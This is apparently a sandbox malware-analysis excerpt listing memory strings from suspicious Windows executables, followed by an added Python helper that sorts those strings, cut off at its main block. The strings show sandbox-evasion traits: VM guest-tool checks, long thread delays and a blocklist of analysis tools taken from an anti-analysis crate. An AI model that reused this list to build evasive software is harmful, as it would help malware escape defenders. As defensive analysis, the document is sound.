                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe Thread delayed: delay time: 59626
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe Thread delayed: delay time: 922337203685477
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
                            Source: explert.exe, 0000000E.00000002.1845219099.00000000008FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Avmtoolsd.dll
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionl
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor&Ef!
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
                            Source: sys_updater.exe, 00000018.00000003.2686049114.0000021E03765000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2660087797.0000021E03567000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2759055860.00000159F38C7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2779479672.00000159F38C8000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2915091882.0000020E49827000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2958783527.0000020E498F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor.
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition7w
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: VMwareUsM1
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
                            Source: sys_updater.exe.26.drBinary or memory string: hollows_hunter32procexp64.exeprocexp.exeProcmon.exeProcmon64.exepestudio.exeKsDumper.exeprl_cc.exeprl_tools.exepe-sieve64.exeMoneta64.exefakenet.exeWireshark.exeVBoxService.exeVMwareUser.exevmtoolsd.exeVMwareTray.exevmsrvc.exeVBoxTray.exeC:\Users\Hassp\.cargo\registry\src\index.crates.io-6f17d22bba15001f\antilysis-0.1.2\src\lib.rs>
                            Source: sys_updater.exe, 0000001B.00000003.2718630551.00000159F3479000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rom cache9588WININET: Bytes from server9590WINHTTP: Bytes from cache9592WINHTTP: Bytes from server9594OTHER: Bytes from cache9596OTHER: Bytes from server9598Discovery: Attempted discoveries9600Local Cache: Cache complete file segments9602Local Cache: Cache partial file segments9604Hosted Cache: Client file segment offers made9606Retrieval: Average branch rate9608Discovery: Successful discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes?
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service#GR
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2144347558.00000234D412A000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2142157004.00000234D412A000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2144672790.00000234D410F000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2142269009.00000234D412A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 048
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionsys.D
                            Source: sys_updater.exe, 00000022.00000003.2888952827.00000237D326B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Count
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                            Source: sys_updater.exe, 0000001F.00000003.2836207562.0000020E47B63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O 
TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
                            Source: sys_updater.exe, 00000022.00000003.2930228516.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935332753.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2925919889.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2934420769.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935892757.00000237D3262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 
04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cac
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: vmsrvc.eM1
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processordll
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionM
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes86
                            Source: sys_updater.exe, 00000022.00000003.2927093740.00000237D309E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2923163784.00000237D3099000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hyp
                            Source: sys_updater.exe, 00000022.00000003.2922988922.00000237D309F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT 
Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec
                            Source: sys_updater.exe, 00000022.00000000.2519363810.00007FF6712E1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: VMwareTrM1
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root PartitionfUmk
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processort
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152848590.00000234D4103000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2637181998.0000021E0170C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor 
Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
                            Source: explert.exe, 00000003.00000002.1679510345.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd.dllM
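Two kinds of string hits are mixed in the rows of this signature. The sys_updater.exe.26.dr row shows the sample's analysis-tool blocklist as one fused run (Rust keeps string literals back to back in .rdata with no terminators, and the cargo registry path in the same row points at the antilysis 0.1.2 crate), while most other rows are numbered runs with the index/name shape of the Windows Perflib 009\Counter name table, which is typically present in the memory of a process that has queried performance data and so says little about intent on its own. The Python below is an added triage helper, not part of Joe Sandbox or of the sample: it tokenizes the fused blocklist against the names visible in this signature's rows (including qemu-ga.exe and vmtoolsd.dll from the MSBuild.exe and explert.exe rows) and separates such hits from counter-table residue. The sample inputs are copied from the rows above; the category grouping and the "four digits followed by a capital letter" heuristic are this example's own assumptions.

```python
import re

# Constructed inputs copied from this report's evidence rows; trailing junk bytes
# and the cargo path suffix are dropped. They are sample data for the helpers below.
FUSED_TOOL_LIST = (
    "hollows_hunter32procexp64.exeprocexp.exeProcmon.exeProcmon64.exepestudio.exe"
    "KsDumper.exeprl_cc.exeprl_tools.exepe-sieve64.exeMoneta64.exefakenet.exe"
    "Wireshark.exeVBoxService.exeVMwareUser.exevmtoolsd.exeVMwareTray.exe"
    "vmsrvc.exeVBoxTray.exe"
)
PERFLIB_FRAGMENT = (
    "6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions"
    "4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time"
    "4812Hypervisor Run Time4814Hardware Interrupts/sec"
)
BARE_KEYWORD = "Hyper-V VM Vid Partition"

# Names that appear in this signature's rows, grouped by what their presence in a
# blocklist implies. The grouping is this example's own triage convention.
KNOWN_NAMES = {
    "vm_guest_tools": [
        "VBoxService.exe", "VBoxTray.exe", "VMwareUser.exe", "VMwareTray.exe",
        "vmtoolsd.exe", "vmtoolsd.dll", "vmsrvc.exe", "prl_cc.exe", "prl_tools.exe",
        "qemu-ga.exe",
    ],
    "analysis_tools": [
        "procexp.exe", "procexp64.exe", "Procmon.exe", "Procmon64.exe",
        "pestudio.exe", "KsDumper.exe", "pe-sieve64.exe", "Moneta64.exe",
        "fakenet.exe", "Wireshark.exe",
    ],
}

# Perflib's Counter value alternates a numeric index with a name; in a memory dump
# that shows up as a four-digit run glued to a capitalised name. Assumed heuristic.
PERFLIB_PAIR = re.compile(r"\d{4}(?=[A-Z%])")


def tokenize_fused_list(blob, vocabulary=KNOWN_NAMES):
    """Split a terminator-less string table into (category, name) tokens.

    Splitting on ".exe" would glue the unknown leading fragment onto the first
    real name, so the scan instead matches known names at each offset (longest
    first) and reports anything unmatched as ("residue", text).
    """
    lookup = sorted(
        ((name, cat) for cat, names in vocabulary.items() for name in names),
        key=lambda pair: -len(pair[0]),
    )
    tokens, residue, i = [], [], 0
    while i < len(blob):
        for name, cat in lookup:
            if blob.startswith(name, i):
                if residue:
                    tokens.append(("residue", "".join(residue)))
                    residue = []
                tokens.append((cat, name))
                i += len(name)
                break
        else:
            residue.append(blob[i])
            i += 1
    if residue:
        tokens.append(("residue", "".join(residue)))
    return tokens


def looks_like_perflib_table(s, min_pairs=3):
    """True when s carries at least min_pairs index/name pairs, i.e. counter-table residue."""
    return len(PERFLIB_PAIR.findall(s)) >= min_pairs


def classify_memory_string(s):
    """Label one 'Binary or memory string' hit for triage."""
    if looks_like_perflib_table(s):
        return "perflib_counter_table"   # Hyper-V names from the counter table, not intent
    named = [t for t in tokenize_fused_list(s) if t[0] != "residue"]
    if len(named) >= 2:
        return "tool_blocklist"          # a deliberate anti-analysis list
    if named:
        return "single_tool_name"        # one name; weak evidence on its own
    return "keyword_only"


def summarize_blocklist(blob):
    """Count tokens per category so the list's emphasis (VM vs. analysis tools) is visible."""
    counts = {}
    for cat, _ in tokenize_fused_list(blob):
        counts[cat] = counts.get(cat, 0) + 1
    return counts


if __name__ == "__main__":
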